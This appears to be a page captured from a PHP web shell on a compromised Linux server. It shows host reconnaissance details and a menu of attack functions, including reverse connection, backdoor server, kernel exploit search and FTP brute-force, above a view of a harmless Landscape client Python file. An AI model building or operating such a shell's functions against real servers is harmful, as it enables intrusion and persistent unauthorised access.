|
System | : | Linux MiraNet 3.0.0-14-generic-pae #23-Ubuntu SMP Mon Nov 21 22:07:10 UTC 2011 i686 |
Software | : | Apache. PHP/5.3.6-13ubuntu3.10 |
ID | : | uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
|
|
Safe Mode | : | OFF |
Open_Basedir | : | OFF |
Freespace | : | 23.79 GB of 70.42 GB (33.78%) |
|
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON |
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
|
[ System Info ]
[ Processes ]
[ SQL Manager ]
[ Eval ]
[ Encoder ]
[ Mailer ]
[ Back Connection ]
[ Backdoor Server ]
[ Kernel Exploit Search ]
[ MD5 Decrypter ]
[ Reverse IP ]
[ Kill Shell ]
[ FTP Brute-Force ]
|
|
/
usr/
share/
pyshared/
landscape/
- drwxr-xr-x
|
Viewing file: sysvconfig.py (1.64 KB) -rw-r--r--Select action/file-type:  ( +) |  ( +) |  ( +) | Code ( +) | Session ( +) |  ( +) | SDB ( +) |  ( +) |  ( +) |  ( +) |  ( +) |  ( +) |
import os
class ProcessError(Exception): """ Error running a process with os.system. """
class SysVConfig(object):
def __init__(self, filename="/etc/default/landscape-client"): self._filename = filename
def set_start_on_boot(self, flag): current = self._parse_file() current["RUN"] = flag and 1 or 0 self._write_file(current)
def restart_landscape(self): if os.system("/etc/init.d/landscape-client restart"): raise ProcessError("Could not restart client")
def stop_landscape(self): if os.system("/etc/init.d/landscape-client stop"): raise ProcessError("Could not stop client")
def is_configured_to_run(self): """ Return a boolean representing whether the init script will decide to actually start the client when it is run. This method should match the semantics of the checks in debian/landscape-client.init. """ state = self._parse_file() run_value = state.get("RUN", "0") return (not run_value[:1].isspace()) and run_value != "0"
def _parse_file(self): values = {} # Only attempt to parse the file if it exists. if os.path.isfile(self._filename): for line in open(self._filename, "r"): line = line.strip() if "=" in line: key, value = line.split("=") values[key] = value return values
def _write_file(self, values): file = open(self._filename, "w") for key in sorted(values.keys()): file.write("%s=%s\n" % (key, str(values[key]))) file.close()
|